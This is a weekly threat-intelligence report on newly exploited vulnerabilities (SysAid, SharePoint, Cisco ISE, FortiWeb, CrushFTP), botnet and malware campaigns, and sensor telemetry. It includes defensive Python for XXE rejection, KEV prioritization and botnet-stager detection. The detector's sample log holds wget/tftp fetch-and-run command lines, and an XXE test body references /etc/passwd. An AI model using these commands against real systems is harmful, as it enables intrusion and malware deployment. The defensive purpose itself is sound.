This Week in Cybersecurity: CISA KEV additions and intensified threat campaigns

July 25, 2025

Executive Summary

This week’s threat landscape saw a spike in exploitation attempts across various vectors, driven by delays in releasing or applying critical patches. These gaps left enterprise environments vulnerable to active, ongoing attacks.  

The Cybersecurity and Infrastructure Security Agency (CISA) added eight new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. These include three critical Microsoft flaws, two impacting SysAid On-Prem, and one each in Google Chrome, CrushFTP, and Fortinet FortiWeb - all of which now demand immediate remediation due to confirmed exploitation and proof-of-concept availability. Simultaneously, active exploitation was reported in Cisco ISE and ISE-PIC, where unauthenticated attackers are abusing API flaws to achieve remote code execution as root.

Botnet activity escalated significantly, as EnemyBot, Sysrv-K, Andoryu, and AndroxGh0st launched exploitation campaigns against unpatched vulnerabilities in GitLab, Spring Cloud Gateway, and PHP-based applications. Concurrently, IoT-focused botnets such as Mirai, BrickerBot, Bashlite, and Tsunami intensified attacks on exposed routers, with a surge in exploitation attempts against Eir D1000 devices enabling rapid lateral propagation across enterprise networks.

Meanwhile, exploitation of Microsoft SharePoint vulnerabilities has been attributed to sophisticated threat actors, including the China-based groups Linen Typhoon, Violet Typhoon and Storm-2603, with confirmed malicious activity traced back to as early as July 7, 2025. In parallel, Sekoia reported a financially driven threat actor exploiting a remote code execution vulnerability in Craft CMS to deliver payloads such as a crypto miner, the Mimo Loader, and residential proxyware.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed remediation decisions.

CVE-2025-2775
An Improper Restriction of XML External Entity (XXE) Vulnerability in SysAid On-Prem's Checkin processing functionality enables unauthenticated attackers to take over administrator accounts. This flaw, rated with a critical CVSS score of 9.3, affects versions 23.3.40 and earlier. Alarmingly, this XXE vulnerability can also be chained with a separate OS Command Injection flaw, CVE-2024-36394, patched in June 2024. According to WatchTowr Labs, the issue is trivially exploitable via a specially crafted HTTP POST request to the /mdm/checkin endpoint. SysAid resolved this vulnerability in version 24.4.60 build 16. Due to its high impact and the availability of a proof of concept, this vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog.

CVE-2025-2776
An Improper Restriction of XML External Entity Reference Vulnerability in SysAid On-Prem's Server URL processing functionality enables administrator account takeover. This flaw, rated with a critical CVSS score of 9.3, affects versions 23.3.40 and earlier. Alarmingly, this XXE vulnerability can also be chained with the separate OS Command Injection flaw CVE-2024-36394, patched in June 2024. According to WatchTowr Labs, the issue is trivially exploitable via a specially crafted HTTP POST request to the /mdm/checkin endpoint. SysAid resolved this vulnerability in version 24.4.60 build 16. Due to its high impact and the availability of a proof of concept, this vulnerability has been added to the CISA KEV catalog.
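Both SysAid entries above describe XXE in an endpoint that accepts XML from unauthenticated clients. The following Python is an added example, not SysAid's code and not taken from the WatchTowr write-up, of the intake hardening a defender would want on any such endpoint: the request body is refused before any parser sees it if it declares a DTD, which is the only place an XML document can define the external entities that XXE relies on. The /mdm/checkin path comes from the text above; the `<checkin>` element schema, the size limit and the handler function are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed limit: a device check-in is a few hundred bytes, never megabytes.
MAX_BODY_BYTES = 64 * 1024

# A DOCTYPE is the only place an XML document can declare entities, so refusing
# it removes both the XXE and the entity-expansion primitives before parsing.
_DTD_MARKERS = re.compile(r"<!(DOCTYPE|ENTITY)", re.IGNORECASE)


class UnsafeXMLError(ValueError):
    """Raised when a request body is refused before parsing."""


def parse_checkin(body: bytes) -> dict:
    """Parse an MDM check-in body (constructed schema) with no DTD processing.

    Returns the top-level child elements as a dict. Raises UnsafeXMLError for
    bodies that are oversized, contain NUL bytes (a sign of a UTF-16 encoding
    meant to slip past the text check), are not UTF-8, or declare a DTD.
    """
    if len(body) > MAX_BODY_BYTES:
        raise UnsafeXMLError("body exceeds size limit")
    if b"\x00" in body:
        raise UnsafeXMLError("NUL byte in body")
    try:
        text = body.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise UnsafeXMLError("body is not UTF-8") from exc
    if _DTD_MARKERS.search(text):
        raise UnsafeXMLError("DTD or entity declaration not allowed")
    # With no DOCTYPE present there is nothing for the parser to resolve.
    root = ET.fromstring(body)
    if root.tag != "checkin":
        raise UnsafeXMLError("unexpected root element")
    return {child.tag: (child.text or "").strip() for child in root}


def handle_post(path: str, body: bytes) -> tuple:
    """Minimal request handler (constructed): 400 for refused or malformed
    bodies, 200 with the parsed fields otherwise."""
    if path != "/mdm/checkin":
        return 404, "not found"
    try:
        return 200, parse_checkin(body)
    except (UnsafeXMLError, ET.ParseError) as exc:
        return 400, f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed sample bodies: a benign check-in and one carrying a DTD.
    good = b"<checkin><device>lab-laptop-01</device><os>Windows 11</os></checkin>"
    bad = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE checkin [<!ENTITY x SYSTEM "file:///etc/passwd">]>'
           b"<checkin><device>&x;</device></checkin>")
    print(handle_post("/mdm/checkin", good))
    print(handle_post("/mdm/checkin", bad))
```

The body must decode as UTF-8 and contain no NUL bytes before the DOCTYPE check runs, so a document re-encoded as UTF-16 to evade a text match is refused rather than parsed. Rejecting DTDs outright also blocks entity-expansion denial of service, not only file disclosure, and costs nothing on an endpoint whose legitimate clients never send one.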

CVE-2025-6558
An Improper Input Validation Vulnerability in Google Chrome has been identified that allows remote attackers to escape the browser sandbox via a specially crafted HTML page. Discovered by Google's Threat Analysis Group, the flaw resides in Chrome's ANGLE (Almost Native Graphics Layer Engine) and GPU components, where insufficient input validation can be leveraged to manipulate the rendering pipeline and execute arbitrary code. As ANGLE translates WebGL and other graphics API calls into native system instructions, the vulnerability presents a critical attack surface. Google has confirmed active exploitation in the wild. In response, a stable update has been released for Chrome version 138.0.7204.157/.158 across Windows, Mac, and Linux platforms, with automatic rollout in progress. Due to its severity and ongoing exploitation, this vulnerability has been added to the CISA KEV catalog, reinforcing the urgent need for users to apply the update immediately.

CVE-2025-20281, CVE-2025-20282 and CVE-2025-20337
Cisco has updated its security advisory to confirm active exploitation of multiple critical vulnerabilities affecting its Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC). CVE-2025-20281 and CVE-2025-20337 stem from weaknesses in a specific API, which could allow remote attackers to execute arbitrary code on the underlying operating system with root privileges simply by sending a crafted API request.

Meanwhile, CVE-2025-20282 involves an internal API flaw that allows attackers to upload and execute arbitrary files on the system, again as root, by exploiting insufficient validation mechanisms. All three vulnerabilities are remotely exploitable without authentication, significantly raising the threat level for unpatched instances, especially in environments that require strict compliance or handle sensitive operations. Cisco urges immediate patching to mitigate the threat.

CVE-2025-25257
An SQL Injection Vulnerability in Fortinet FortiWeb allows unauthenticated attackers to execute arbitrary SQL commands via crafted HTTP/HTTPS requests. With a critical CVSS Score of 9.8, this flaw affects versions 7.6.0–7.6.3, 7.4.0–7.4.7, 7.2.0–7.2.10, and below 7.0.10. According to WatchTowr Labs, the issue originates from the get_fabric_user_by_token function in the Fabric Connector component, accessible through multiple API endpoints. Fortinet has released patches in versions 7.6.4, 7.4.8, 7.2.11, and 7.0.11. Users are urged to update immediately or disable the HTTP/HTTPS admin interface as a temporary workaround. Proof of concept is publicly available, and the flaw is listed in the CISA KEV catalog due to active exploitation.

CVE-2025-49704
A Code Injection Vulnerability in Microsoft SharePoint, affecting SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Enterprise Server 2016, allows authorized attackers to execute arbitrary code over a network. According to Microsoft, this flaw can be chained with CVE-2025-49706 to escalate impact. Microsoft also noted that the patch for CVE-2025-53770 includes more robust protections than the fix for CVE-2025-49704. Cybersecurity firm Eye Security uncovered an active, large-scale exploitation campaign, dubbed "ToolShell", in which unauthenticated attackers are leveraging the CVE-2025-49704 and CVE-2025-49706 chain to take full control of on-premises SharePoint servers globally. CISA has added this vulnerability to its KEV catalog, highlighting the need for urgent patching.

CVE-2025-49706
An Improper Authentication Vulnerability in Microsoft SharePoint, affecting SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Enterprise Server 2016, allows an authorized attacker to perform spoofing over a network. Successful exploitation may lead to unauthorized viewing of sensitive data and modification of exposed information. According to Microsoft, this flaw can be chained with CVE-2025-49704 to escalate its impact, and the patch for CVE-2025-53771 includes more robust protections than the fix for CVE-2025-49706. Cybersecurity firm Eye Security has observed this vulnerability being leveraged in the active, large-scale exploitation campaign dubbed "ToolShell," where unauthenticated attackers are exploiting the CVE-2025-49704 and CVE-2025-49706 chain to gain full control over on-premises SharePoint servers globally. In response, CISA has added this vulnerability to its KEV catalog, urging immediate remediation.

CVE-2025-53770
A Deserialization of Untrusted Data Vulnerability in Microsoft SharePoint allows unauthorized attackers to execute arbitrary code over a network. The flaw affects SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Enterprise Server 2016. According to Microsoft, the patch for CVE-2025-53770 offers more comprehensive protections compared to the fix for CVE-2025-49704. This vulnerability has been exploited as a zero-day in the wild and was added to the CISA KEV catalog, urging organizations to apply security updates without delay.

CVE-2025-54309
An Unprotected Alternate Channel Vulnerability in CrushFTP allows remote attackers to gain administrative access via HTTPS when the DMZ proxy feature is disabled, due to improper AS2 validation. The flaw impacts CrushFTP versions 10 before 10.8.5 and 11 before 11.3.4_23. Patched versions 11.3.4_26 and 10.8.5_12 were released on July 18, 2025. CrushFTP confirmed detecting in-the-wild exploitation of this zero-day on the same day, though it may have been weaponized earlier. CISA added this vulnerability to its KEV catalog, highlighting its severity.
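Every entry in this section ends with the vulnerability being added to the CISA KEV catalog, and it is the catalog's dueDate field that turns a listing into a remediation deadline. The following Python is an added example, not Loginsoft's tooling, of how a defender can rank an asset inventory against a KEV feed: unpatched CVEs that are in KEV sort first by days remaining to the due date, then by ransomware association, then by exposed asset count; unpatched CVEs not in KEV follow. The feed snapshot is constructed in the shape of CISA's published known_exploited_vulnerabilities.json (the field names cveID, vendorProject, product, dateAdded, dueDate and knownRansomwareCampaignUse are the feed's own; the dates, flags and the inventory are placeholders, not the catalog's actual values).

```python
import json
from datetime import date

# Constructed snapshot in the shape of CISA's KEV JSON feed. Field names match
# the published feed; the dates and ransomware flags are placeholders, not the
# catalog's real values. The CVE IDs are the ones discussed in this report.
KEV_SNAPSHOT = json.dumps({
    "title": "constructed KEV snapshot",
    "vulnerabilities": [
        {"cveID": "CVE-2025-53770", "vendorProject": "Microsoft", "product": "SharePoint",
         "dateAdded": "2025-07-20", "dueDate": "2025-07-21", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-2775", "vendorProject": "SysAid", "product": "SysAid On-Prem",
         "dateAdded": "2025-07-22", "dueDate": "2025-08-12", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-54309", "vendorProject": "CrushFTP", "product": "CrushFTP",
         "dateAdded": "2025-07-22", "dueDate": "2025-08-12", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-25257", "vendorProject": "Fortinet", "product": "FortiWeb",
         "dateAdded": "2025-07-18", "dueDate": "2025-08-08", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed asset inventory: which CVEs are present and whether they are fixed.
INVENTORY = [
    {"cve": "CVE-2025-53770", "assets": 3, "patched": False},
    {"cve": "CVE-2025-2775", "assets": 1, "patched": False},
    {"cve": "CVE-2025-54309", "assets": 2, "patched": False},
    {"cve": "CVE-2025-6558", "assets": 40, "patched": True},
    {"cve": "CVE-2024-47176", "assets": 12, "patched": False},
]


def load_kev(kev_json: str) -> dict:
    """Index a KEV feed by CVE ID."""
    return {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}


def prioritize(inventory: list, kev_json: str, today: date) -> list:
    """Rank unpatched inventory entries: KEV-listed first (soonest due date,
    then ransomware-linked, then most assets), then the rest by asset count."""
    kev = load_kev(kev_json)
    rows = []
    for item in inventory:
        if item["patched"]:
            continue
        entry = kev.get(item["cve"])
        row = {"cve": item["cve"], "assets": item["assets"],
               "in_kev": entry is not None, "days_to_due": None, "ransomware": False}
        if entry is not None:
            row["days_to_due"] = (date.fromisoformat(entry["dueDate"]) - today).days
            row["ransomware"] = entry["knownRansomwareCampaignUse"] == "Known"
        rows.append(row)
    rows.sort(key=lambda r: (not r["in_kev"],
                             r["days_to_due"] if r["in_kev"] else 0,
                             not r["ransomware"],
                             -r["assets"]))
    return rows


def overdue(rows: list) -> list:
    """CVE IDs whose KEV due date has already passed."""
    return [r["cve"] for r in rows if r["in_kev"] and r["days_to_due"] < 0]


if __name__ == "__main__":
    ranked = prioritize(INVENTORY, KEV_SNAPSHOT, date(2025, 7, 25))
    for row in ranked:
        print(row)
    print("overdue:", overdue(ranked))
```

Run against the live feed, the same function tells a team which of this week's additions are already past their due date and which non-KEV findings can wait behind them. Because the feed only carries CVEs with confirmed exploitation, anything it returns as overdue is a genuine exposure, not a CVSS-only guess.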

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

Vulnerability | Product | Severity | Title | Exploited in-the-wild | CISA KEV
CVE-2024-47176 | CUPS | Medium | Improper Input Validation Vulnerability in OpenPrinting CUPS browsed through 2.0.1 leads to remote code execution | True | False
CVE-2024-4577 | PHP-CGI on Windows | High | Critical Argument Injection Vulnerability in PHP on Windows servers | True | True
CVE-2024-3721 | TBK DVR Devices | Medium | OS Command Injection Vulnerability in TBK DVR-4104 and DVR-4216 up to 20240412 | False | False
CVE-2024-3400 | Palo Alto Networks PAN-OS | Critical | Command Injection Vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS | True | True
CVE-2024-1709 | ConnectWise ScreenConnect | Critical | Authentication Bypass Vulnerability in ConnectWise ScreenConnect through 23.9.7 leads to sensitive information disclosure | True | True
CVE-2023-4966 | NetScaler ADC and Gateway | Critical | Buffer overflow vulnerability in NetScaler ADC and NetScaler Gateway leads to sensitive information disclosure | True | True
CVE-2023-2245 | HansunCMS | Critical | Unrestricted file upload vulnerability in hansunCMS 1.4.3 | False | True
CVE-2023-38646 | Metabase open source and Enterprise | Critical | Remote Code Execution Vulnerability in Metabase open source and Metabase Enterprise | True | False
CVE-2023-24488 | Citrix ADC and Citrix Gateway | Medium | Cross Site Scripting Vulnerability in Citrix ADC and Citrix Gateway | True | False
CVE-2023-26801 | LB-LINK | Critical | Command Injection Vulnerability in LB-LINK devices | True | False

Vulnerabilities abused by Botnet

This section lists vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP, and presents the top 5 CVEs whose payloads are suggestive of botnet activity, such as fetching a second stage with wget from a bare IP address.

Vulnerability | Product | Title | Exploit | Abused by Botnet
CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K
CVE-2021-22205 | Gitlab-Exiftool | Remote Code Execution Vulnerability in Gitlab-Exiftool | True | Andoryu
CVE-2017-9841 | Util/PHP/eval-stdin.php in PHPUnit | Arbitrary PHP Code Execution Vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st
CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control Vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai
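The last column of the table rests on the heuristic stated in this section's introduction: a request payload that fetches something with wget (or tftp, or curl) from a bare IP address and then runs it is characteristic of a botnet stager. The following Python is an added example, not Loginsoft's sensor pipeline, of that heuristic applied to constructed sensor-style log lines (timestamp, source, method, path and payload separated by pipes; every address is from the RFC 5737 documentation ranges). A line is flagged only when a downloader command and an IP-literal host both appear, so a request that merely mentions wget, or a fetch from a DNS name, is left alone.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Commands botnet stagers use to fetch their binaries.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)
# http(s) URL whose host is a bare IPv4 literal rather than a DNS name.
IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d{1,5})?(?:/|\s|$)", re.IGNORECASE)
# tftp passes the server as a bare argument instead of a URL.
TFTP_IP_RE = re.compile(r"\btftp\b[^;&|]*?(\d{1,3}(?:\.\d{1,3}){3})", re.IGNORECASE)
# Make-executable-then-run chains that follow the download.
EXEC_CHAIN_RE = re.compile(r"chmod\s+[+0-9]\S*|\./[\w.-]+|\b(?:sh|bash)\s+[\w./-]+", re.IGNORECASE)

# Constructed sensor log: ts|src|method|path|payload. Addresses are RFC 5737.
SAMPLE_LOG = [
    "2025-07-21T10:14:02Z|203.0.113.5|POST|/index.php|cd /tmp; wget http://198.51.100.7/bins/arm7; chmod 777 arm7; ./arm7",
    "2025-07-21T10:15:40Z|203.0.113.9|POST|/cgi-bin/login|cd /tmp || cd /var; tftp -g -r x86 198.51.100.7; chmod +x x86; ./x86",
    "2025-07-21T10:16:11Z|203.0.113.14|GET|/robots.txt|-",
    "2025-07-21T10:17:03Z|203.0.113.21|POST|/api/v1/run|cmd=wget%20http%3A%2F%2F192.0.2.44%3A8080%2Fbot.sh%3B%20sh%20bot.sh",
    "2025-07-21T10:18:27Z|203.0.113.30|POST|/update|curl -fsSL https://updates.example.com/agent.sh | sh",
    "2025-07-21T10:19:09Z|203.0.113.33|POST|/search|q=wget%20vs%20curl%20comparison",
]


def _valid_ipv4(text: str) -> bool:
    """Drop regex matches such as 999.1.1.1 that are not real IPv4 addresses."""
    try:
        return isinstance(ipaddress.ip_address(text), ipaddress.IPv4Address)
    except ValueError:
        return False


def analyse_payload(raw: str) -> dict:
    """Score one payload. URL-decoding first catches percent-encoded commands."""
    payload = unquote_plus(raw)
    hosts = {m.group(1) for m in IP_URL_RE.finditer(payload)}
    hosts |= {m.group(1) for m in TFTP_IP_RE.finditer(payload)}
    hosts = sorted(h for h in hosts if _valid_ipv4(h))
    indicators = []
    if DOWNLOADER_RE.search(payload):
        indicators.append("downloader")
    if hosts:
        indicators.append("ip_literal_host")
    if EXEC_CHAIN_RE.search(payload):
        indicators.append("exec_chain")
    # Both a fetch command and a bare-IP host are required to call it a stager.
    stager = "downloader" in indicators and "ip_literal_host" in indicators
    return {"botnet_stager": stager, "indicators": indicators, "hosts": hosts}


def scan(lines: list) -> list:
    """Return the flagged records (source, path, distribution hosts) from a log."""
    hits = []
    for line in lines:
        ts, src, method, path, payload = line.split("|", 4)
        verdict = analyse_payload(payload)
        if verdict["botnet_stager"]:
            hits.append({"ts": ts, "src": src, "method": method, "path": path,
                         "hosts": verdict["hosts"], "indicators": verdict["indicators"]})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The extracted hosts are the candidate indicators to block at the edge or hunt for in outbound proxy logs, since a successful stager will connect back to the same address. The regexes are deliberately narrow; widening them to cover shell-escaped or base64-wrapped variants raises recall at the cost of false positives, so tune against your own traffic before alerting on them.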

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities that adversaries are targeting. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is drawn from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.

CVE-2025-32432
According to Sekoia, a financially motivated threat actor has been observed exploiting CVE-2025-32432, a critical remote code execution vulnerability in Craft CMS, to deploy a series of malicious payloads, including the Mimo Loader, a cryptocurrency miner, and residential proxyware. This flaw was originally disclosed by Orange Cyberdefense SensePost after it was seen actively exploited as early as February 2025. The attackers leveraged this vulnerability to gain unauthorized access to targeted systems and install a web shell for persistent remote control. The deployed Mimo Loader was then used to drop XMRig for cryptomining and IPRoyal proxyware to hijack the victim's internet bandwidth, leveraging both cryptojacking and proxyjacking techniques for financial gain. Sekoia attributed the exploitation to a Turkish IP address (85.106.113[.]168) and linked the activity to the Mimo threat actor, believed to be based in Turkey.

Microsoft Links SharePoint Exploits to Chinese APTs
Microsoft has officially attributed the recent exploitation of vulnerabilities in internet-facing SharePoint Server instances to three China-based threat actors: Linen Typhoon, Violet Typhoon, and Storm-2603. The activity, first observed as early as July 7, 2025, aligns with earlier threat intelligence reports. Linen Typhoon (aka APT27 or Emissary Panda) has a long history of cyberespionage using tools like SysUpdate and PlugX. Violet Typhoon (aka APT31) has been active since 2015, previously targeting countries such as the U.S., Finland, and Czechia. Storm-2603, meanwhile, has been linked to both Warlock and LockBit ransomware campaigns. Microsoft warns that with the growing adoption of these exploits, attackers are likely to continue targeting unpatched SharePoint systems. To counter this threat, organizations are advised to deploy and configure the Antimalware Scan Interface (AMSI) in Full Mode and enable endpoint protection such as Microsoft Defender Antivirus across all on-premises SharePoint environments.

Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS
CVE-2025-32432 | Critical | A Remote Code Execution in the Craft CMS | Yes | Mimo, Mimo Loader, IPRoyal proxyware, XMRig miner | True
CVE-2025-49704 | High | A Code Injection Vulnerability in Microsoft SharePoint | Yes | Linen Typhoon, Violet Typhoon, Storm-2603 | False
CVE-2025-49706 | Medium | An Improper Authentication Vulnerability in Microsoft SharePoint | Yes | Linen Typhoon, Violet Typhoon, Storm-2603 | False
CVE-2025-53770 | Critical | A Deserialization of Untrusted Data Vulnerability in Microsoft SharePoint | Yes | Linen Typhoon, Violet Typhoon, Storm-2603 | False
CVE-2025-53771 | Medium | An Improper Authentication Vulnerability in Microsoft SharePoint | Yes | Linen Typhoon, Violet Typhoon, Storm-2603 | False

PRE-NVD observed for this week

PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database (NVD). The LOVI Platform aggregates and distributes data from open sources and social media; it currently tracks over 100 security alerts and is planned to expand.

CVE-ID | Type of Vulnerability | Product | Reference
CVE-2025-3128 | OS Command Injection | Mitsubishi Electric smartRTU | Resource
CVE-2025-6812 | Local Privilege Escalation | Parallels Client | Resource
CVE-2025-8042 | Sandbox Escape | Firefox for Android | Resource
CVE-2025-30200 | Use of Hard-coded Cryptographic Key | ECOVACS robot vacuums and base stations | Resource

External References

  1. https://www.cisa.gov/news-events/alerts/2025/07/20/microsoft-releases-guidance-exploitation-sharepoint-vulnerability-cve-2025-53770
  2. https://www.cisa.gov/news-events/alerts/2025/07/22/cisa-adds-four-known-exploited-vulnerabilities-catalog
  3. https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/
  4. https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
  5. https://research.eye.security/sharepoint-under-siege/
  6. https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-campaign-targeting-craft-cms/
  7. https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-rce-ZAd2GnJ6
  8. https://www.cisa.gov/news-events/alerts/2025/07/18/cisa-adds-one-known-exploited-vulnerability-catalog
